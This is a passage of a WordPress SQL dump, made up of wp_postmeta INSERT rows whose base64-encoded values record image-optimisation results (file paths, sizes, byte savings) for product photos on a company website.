WN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyODE2LCJpZCI6MTgwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI4MTksImlkIjoxODA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyODIzLCJpZCI6MTgwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI4MjYsImlkIjoxODA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjgyOCwiaWQiOjE4MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyODMxLCJpZCI6MTgwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI4MzQsImlkIjoxODA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyODM2LCJpZCI6MTgwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Mjg0NCwiaWQiOjE4MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI4NDcsImlkIjoxODA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USEUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyODUwLCJpZCI6MTgwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhFLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIRS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjIwNSwidGltZSI6MTQ4MzU2Mjg1MywiaWQiOjE4MDV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29156, 1804, 'wpfc_optimisation_reduction', '25573'); 
INSERT INTO `wp_postmeta` VALUES (29157, 1804, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYyODU4LCJpZCI6IjE4MDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODYzLCJ0aW1lIjoxNDgzNTYyODYxLCJpZCI6MTgwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI5MTksInRpbWUiOjE0ODM1NjI4NjUsImlkIjoxODA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjU5OSwidGltZSI6MTQ4MzU2Mjg2OCwiaWQiOjE4MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyNjY5LCJ0aW1lIjoxNDgzNTYyODcyLCJpZCI6MTgwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5OSwidGltZSI6MTQ4MzU2Mjg3NSwiaWQiOjE4MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjcsInRpbWUiOjE0ODM1NjI4NzksImlkIjoxODA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTgzLCJ0aW1lIjoxNDgzNTYyODgyLCJpZCI6MTgwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4NzQsInRpbWUiOjE0ODM1NjI4ODUsImlkIjoxODA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTIsInRpbWUiOjE0ODM1NjI4ODksImlkIjoxODA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NzEsInRpbWUiOjE0ODM1NjI4OTIsImlkIjoxODA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzIsInRpbWUiOjE0ODM1NjI4OTUsImlkIjoxODA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NDcsInRpbWUiOjE0ODM1NjI4OTksImlkIjoxODA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTEtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0xLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzc4LCJ0aW1lIjoxNDgzNTYyOTAyLCJpZCI6MTgwNH1d'); 
INSERT INTO `wp_postmeta` VALUES (29158, 1802, 'wpfc_optimisation_reduction', '2938685'); 
INSERT INTO `wp_postmeta` VALUES (29159, 1802, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEuanBnIiwicmVkdWN0aW9uIjoyOTM4NjY4LCJ0aW1lIjoxNDgzNTYyOTE0LCJpZCI6IjE4MDIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjkxNiwiaWQiOjE4MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzX